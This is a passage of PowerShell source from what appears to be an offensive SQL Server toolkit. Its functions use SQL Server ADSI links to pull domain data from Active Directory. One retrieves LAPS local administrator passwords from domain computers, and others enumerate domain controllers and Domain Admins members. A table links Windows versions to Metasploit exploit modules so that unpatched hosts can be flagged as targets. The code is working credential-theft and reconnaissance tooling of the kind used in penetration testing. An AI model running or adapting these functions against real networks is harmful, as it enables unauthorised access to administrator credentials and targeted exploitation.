ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } $TableLAPS = New-Object System.Data.DataTable $TableLAPS.Columns.Add('Hostname') | Out-Null $TableLAPS.Columns.Add('Password') | Out-Null $TableLAPS.Clear() } Process { # Call Get-SQLDomainObject if($UseAdHoc){ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,ms-MCS-AdmPwd,adspath' -UseAdHoc }else{ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,ms-MCS-AdmPwd,adspath' } $Result | ForEach-Object { $CurrentHost = $_.dnshostname $CurrentPassword = $_.'ms-MCS-AdmPwd' # Check for readable password and add to table if ([string]$CurrentPassword) { # Add domain computer to data table $TableLAPS.Rows.Add($CurrentHost,$CurrentPassword) | Out-Null } } $TableLAPS } End { } } # ---------------------------------- # Get-SQLDomainController # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainController { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain controllers via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainController -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainController -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } } Process { # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" -LdapFields 'name,dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" -LdapFields 'name,dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' } } End { } } # ---------------------------------- # Get-SQLDomainExploitableSystem # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainExploitableSystem { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain exploitable computers via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainExploitableSystem -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Create data table for list of patches levels with a MSF exploit $TableExploits = New-Object System.Data.DataTable $TableExploits.Columns.Add('OperatingSystem') | Out-Null $TableExploits.Columns.Add('ServicePack') | Out-Null $TableExploits.Columns.Add('MsfModule') | Out-Null $TableExploits.Columns.Add('CVE') | Out-Null # Add exploits to data table $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") | Out-Null $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") | Out-Null $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null # Create data table to house vulnerable server list $TableVulnComputers = New-Object System.Data.DataTable $TableVulnComputers.Columns.Add('ComputerName') | Out-Null $TableVulnComputers.Columns.Add('OperatingSystem') | Out-Null $TableVulnComputers.Columns.Add('ServicePack') | Out-Null $TableVulnComputers.Columns.Add('LastLogon') | Out-Null $TableVulnComputers.Columns.Add('MsfModule') | Out-Null $TableVulnComputers.Columns.Add('CVE') | Out-Null } Process { # Call Get-SQLDomainObject if($UseAdHoc){ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' -UseAdHoc }else{ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' } # Iterate through each exploit $TableExploits | ForEach-Object { $ExploitOS = $_.OperatingSystem $ExploitSP = $_.ServicePack $ExploitMsf = $_.MsfModule $ExploitCve = $_.CVE # Iterate through each ADS computer $Result | ForEach-Object { $AdsHostname = $_.DNSHostName $AdsOS = $_.OperatingSystem $AdsSP = $_.OperatingSystemServicePack $AdsLast = $_.LastLogon # Add exploitable systems to vuln computers data table if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ){ # Add domain computer to data table $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,[dateTime]::FromFileTime($AdsLast),$ExploitMsf,$ExploitCve) | Out-Null } } } $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending } End { } } # ---------------------------------- # Get-SQLDomainGroupMember # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainGroupMember { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain group members via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FilterGroup Domain group to filter for. .EXAMPLE PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -FilterGroup 'Enterprise Admins' .EXAMPLE PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -FilterGroup 'Enterprise Admins' .EXAMPLE PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainGroupMember -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain group to filter for.')] [string]$FilterGroup, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup group filter if((-not $FilterGroup)){ $FilterGroup = 'Domain Admins' } $TableMembers = New-Object System.Data.DataTable $TableMembers.Columns.Add('Group') | Out-Null $TableMembers.Columns.Add('sAMAccountName') | Out-Null $TableMembers.Columns.Add('displayName') | Out-Null } Process { # Call Get-SQLDomainObject to get group DN if($UseAdHoc){ $FullDN = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=group)(samaccountname=$FilterGroup))" -LdapFields 'distinguishedname' -UseAdHoc -SuppressVerbose }else{ $FullDN = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=group)(samaccountname=$FilterGroup))" -LdapFields 'distinguishedname' -SuppressVerbose } $DN = $FullDN.distinguishedname # Call Get-SQLDomainObject to get group membership if($UseAdHoc){ $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=user)(memberOf=$DN))" -LdapFields 'samaccountname,displayname' -UseAdHoc }else{ $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=user)(memberOf=$DN))" -LdapFields 'samaccountname,displayname' } $Results | ForEach-Object { $TableMembers.Rows.Add($FilterGroup,$_.samaccountname,$_.displayname) | Out-Null } $TableMembers } End { } } # ---------------------------------- # Get-SQLSysadminCheck # ---------------------------------- # Author: Scott Sutherland Function Get-SQLSysadminCheck { <# .SYNOPSIS Check if login is has sysadmin privilege on the target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLSysadminCheck -Instance SQLServer1\STANDARDDEV2014 ComputerName Instance IsSysadmin ------------ -------- ---------- SQLServer1 SQLServer1\STANDARDDEV2014 Yes .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcure -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Data for output $TblSysadminStatus = New-Object -TypeName System.Data.DataTable # Setup CredentialName filter if($CredentialName) { $CredentialNameFilter = " WHERE name like '$CredentialName'" } else { $CredentialNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = "SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], CASE WHEN IS_SRVROLEMEMBER('sysadmin') = 0 THEN 'No' ELSE 'Yes' END as IsSysadmin" # Execute Query $TblSysadminStatusTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblSysadminStatus = $TblSysadminStatus + $TblSysadminStatusTemp } End { # Return data $TblSysadminStatus } } # ---------------------------------- # Get-SQLLocalAdminCheck # ---------------------------------- # Author: Scott Sutherland Function Get-SQLLocalAdminCheck { <# .SYNOPSIS Check if the current Windows user is running in a local adminsitrator context. PS C:\> Get-SQLLocalAdminCheck $true #> Begin { } Process { # Get current windows user $WinCurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() # Get current windows username $WinCurrentUserName = $WinCurrentUser.name # Get current windows user's groups $WinGroups = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($WinCurrentUser) # Check if the current windows user/groups are local administrators / process is elevated $WinRoleCheck = [System.Security.Principal.WindowsBuiltInRole]::Administrator # Return true or false $WinGroups.IsInRole($WinRoleCheck) } End { } } # ---------------------------------- # Get-SQLServiceAccount # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServiceAccount { <# .SYNOPSIS Returns a list of service account names for SQL Servers services by querying the registry with xp_regread. This can be executed against remote systems. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. 